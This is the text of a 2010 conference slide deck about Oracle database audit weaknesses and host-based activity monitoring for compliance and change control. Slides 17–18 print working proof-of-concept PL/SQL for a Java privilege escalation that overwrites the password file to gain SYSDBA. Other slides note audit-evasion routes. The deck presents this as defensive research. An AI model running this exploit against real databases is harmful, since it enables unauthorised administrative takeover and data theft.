Securely Recording The Use of Privilege In Oracle Databases Paul M. Wright June 2010 for Sentrigo 1 Overview of presentation • State of database auditing today. • Problems with Oracle audit >> demo! • Solution >> Database Application Activity Monitoring Systems (DAMS). • SAS70 project I completed in the financial services using Hedgehog DAMS. • Advanced DAMS usage: – Fix Java zero days in Oracle – Verifying DBA change tickets using DAMS – Record and protect use of DBA privilege • Future of DAMS. State of Database auditing today Database auditing is before the wheel. ..If we consider the security monitoring of a bank vault… 3 DB is the modern Bank Vault • Do bank managers say things like - “I am sorry, but we can not monitor the vault today because it may become too slow to use? • Of course not but.. – DBs are NOT monitored due to performance concerns. • Does the Bank Manager get to switch off the cameras in the vault when they want? – DBA privilege is enough to turn off Database auditing. • An organisation's data can be as valuable as money kept in a vault. • But the ability to securely record access has not been widely available. 4 Known problems with Oracle Audit • SYSDBA privilege can modify audit in SYS.AUD$ • OSDBA privilege can modify .aud files in $ORACLE_HOME/rdbms/audit • Low priv accounts can escalate to SYSDBA. • There are new ways for low privileged accounts to evade audit, with Oracle currently. • Revoking execute on DBMS_SYS_SQL helps reduce some of the risk. • But surely Syslog audit in 10.2 and 11g is now secure? 5 How secure is Syslog audit? • In >= 10.2 AUDIT_SYSLOG_LEVEL sends audit to Syslog remotely or locally to /var/log/secure which is only accessible to root. [oracle@linuxbox ~]$ cat /var/log/secure cat: /var/log/secure: Permission denied [oracle@linuxbox ~]$ su - root Password: [root@linuxbox ~]# cat /var/log/secureMay 17 16:51:39 linuxbox su: pam_unix(su-l:session): • When AUDIT_SYSLOG_LEVEL is set and AUDIT_SYS_OPERATIONS set to TRUE then all SYS* operations are recorded to /var/log/messages even if AUDIT_TRAIL is set to NONE! • Or if AUDIT_TRAIL is set to DB then SYS* actions still go to Syslog and non-SYS* actions go to SYS.AUD$. • This has been incorrectly recommended as secure by a number of authors. • Ok.. Syslog is an improvement on traditional Oracle OS audit via *.aud files which are accessible from the oracle unix account.. • If DBA accounts do not have root access then AUDIT_SYSLOG_LEVEL parameter can provide some separation of duty between UNIX sysadmin root and Oracle DBA/OSDBA accounts. 6 Effective Audit has to be external • Banking separates root access from DBA account. • So value in using AUDIT_SYSLOG_LEVEL ? • But code ran as SYS can still turn off the audit trail as audit is controlled from the DB! • The act of turning off Oracle audit can be hidden. • The only evidence of escalation to SYS would be a mandatory audit entry showing the SYS connection and DB restart. i.e. routine entries >> ignored.. • Low priv user can bypass audit using DBMS_SYS_SQL • Effective audit has to be external >> DEMO 7 External audit solution is DAMS • • • • • • DAMS =External audit outside of DBA privs. Either Host based on OS of DB, App/WWW. Or Network based appliance on a tap. Both Alert to SQL queries and session info. Enables us to see into the black box of the DB. How do these two methods compare? 8 Host vs network based DAMS • Host based has the following advantages: – – – – – – – • Read encrypted/obfuscated exploits. Recognise schemas when not specified. See through a synonym using object keyword. Trace dependencies between packages. Read SSH’d connections. Monitor local bequeath connections from OS. Cannot be turned off by OSDBA/SYSDBA privs Common objections to host-based agents from DBAs are that agents can be: – Unreliable. – Resource intensive. – Add complexity to an already complex system. Also Monitors DBAs which they might not like. • In my experience on recent 1.5 year SAS70 project Sentrigo Hedgehog is reliable and performant. 9 SAS70 Project Overview • • Financial services SAS70 project. Gained compliance with Sentrigo Hedgehog • • • • • • IDS and IPS with prewritten rules User activity monitoring and alerting. Low CPU ~ less than 1% High reliability. Did not affect workings of the DB itself. Project published by UKOUG. Champagne all round. 10 DAMS Server Implementation 11 Production CPU% of HH sensor orc001a_cpu% 1.2 %CPU Sensor using TOP 1 0.8 0.6 0.4 0.2 0 00:00 04:48 09:36 14:24 19:12 00:00 04:48 time over 24 hours 12 Published by UKOUG Nov 2009 SAS70 Sentrigo Hedgehog DAMS project was published in UKOUG SCENE Journal (Nov 2009) and highlighted positively within the Editorial below. 13 Advanced DAMS usage Installation, setup and testing was reasonably straightforward. Then extended with Advanced DAMS usage… 1. Fixed Java priv zero days before patch by scoping effect of change beforehand by using DAMS. 2. Verified DBA change tickets afterwards using DAMS. Benefits: • • • Faster QA process = Competitive advantage Lower risk Prod changes = more resilient systems Protection of the DBA privilege = more security How to fix Java zero days? • I received advanced notification of Hacking Aurora in 11g by David Litchfield. • Zero days. No patch. • Exploit code could be released any day. • Analysed the exploit code and defined a fix. • Revoke public execute from a number of PL/SQL packages and Java classes. • But what about the effects of that fix on the rest of the applications? • This is really a change management problem. 15 Change management methodology • How does change management usually work? • Rely on devs to understand effects of change. • Problems are – complexity – lack of communication and clear documentation – political fiefdoms in an organisation protect their part of the app. • • • • Common solution is to use time delay before changes. If a change does not break QA for a month put in Production. But this is slow and could miss bugs. What about using Hedgehog to enable safe fix testing? • If we can see how an DB/application mechanism works using a DAMS we can predict the effect of a fix 16 PL/SQL Java privilege escalation • • • PoC code is adapted so that it works on 10g. I was first to publish that it also affected 10.2.0.4.3 It grants privileges to execute any file on the OS which is owned by Oracle. SQL> DECLARE 2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 3 CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; 4 BEGIN 5 OPEN C1; 6 FETCH C1 BULK COLLECT INTO POL; 7 CLOSE C1; 8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 9 END; 10 / DECLARE * ERROR at line 1: ORA-29532: Java call terminated by uncaught Java exception: java.lang.SecurityException: policy table update java.lang.RuntimePermission, loadLibrary.* ORA-06512: at "SYS.DBMS_JVM_EXP_PERMS", line 189 ORA-06512: at line 8 17 How to use Java priv to gain SYSDBA PoC code which uses that execute privilege to gain SYSDBA on 11g --Backup the password file: SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper mv /u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11G /u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11Gbu')from dual; --Recreate the password file with known password: SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','ma in', '/u01/app/oracle/product/11.2.0/db_1/bin/orapwd', 'file=/u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11G', 'password=attackersyspassword') from dual; sqlplus /nolog conn sys/attackersyspassword@192.168.1.2/DB11G as sysdba 18 Revoke PUBLIC execute For < 10.2.0.4.4 this is the main revoke: revoke execute on sys.dbms_jvm_exp_perms from PUBLIC; • But what is the effect of this revoke on the rest of the DB and applications that access it? • How do I scope before making the change? • Used normal static analysis of source code and consult with devs and DBAs. • DAMS rules to record access to vulnerable packages. 19 4. Hedgehog Rules monitor vulns Before revoke done check DBMS_JVM_EXP_PERMS not used with HH --Records successful executions of SYS.DBMS_JVM_EXP_PERMS Object=‘SYS.DBMS_JVM_EXP_PERMS’; --Records strings containing ‘DBMS_JVM_EXP_PERMS’ ( includes failed attempts). Statement contains ‘DBMS_JVM_EXP_PERMS’; --Test the queries with a stimulus to make sure they work. Select ‘DBMS_JVM_EXP_PERMS’from dual; 1. Wait for alerts to be generated. 2. No alerts recorded even when using datapump. 3. So can do the revokes with low risk. Can do the same for other packages such as SYS.DBMS_SYS_SQL 20 Securing Java In Oracle • Could use this method for all Java classes in DB to scope removing the JVM completely. • DBMS_JAVA and DBMS_JAVA_TEST do not have the public execute revoked in latest CPU for 11g. • The vulnerability is dealt with only by revoking public execute from oracle/aurora/util/Wrapper • So attacker could use a different vector for DBMS_JAVA. • For example attacker could write their own Wrapper class if they had CREATE PROCEDURE privilege. 21 Verifying Change Tickets Main aim is to monitor the DBA privilege not the DBA person • The vast majority of DBAs are honest and very hard working. • But low priv accounts can be escalated to DBA • With HH we are protecting the DBA’s privilege by – Accurately recording DBA privilege usage – Cross reference DAMS alert to JIRA change ticket number in the change SQL. – Escalate alert if there is no change ticket for the DDL event recorded in HH. • Can only do this when DAMS has a forensic level of accuracy. 22 i.e. No false positives! Results of Project for the Business 1. DAMS installation gained SAS70 compliancy. 2. Protection of knowing not exploited. 3. QA to production process had lower risk. 4. Halve the time fixes spent in QA. 5. Fixed zero days before Oracle patched. 6. Verification of change tickets. 7. SYS privilege usage protected and recorded. 23 Where is this leading? 1. 2. 3. 4. First we had IDS/IPS… SANS. Then User/App activity Monitoring and DAMS Now DAMS change management integration Next stage is automated proactive state checking of code, configuration and user privileges on remote hosts from central state repository. – – – Repscan/PFCLScan can be used for these purposes. Alert to regression of previous vulnerabilities. Verification that policy is being kept to. 24 Summary • In addition to IPS and account activity monitoring. – DAMS can be used to shorten the SDLC. – Reduce risk of development changes. – Bringing transparency to the workings of the database application mechanism. • Host based DAMS provide the best method of securely recording the use of privilege in the Oracle database. • Questions? 25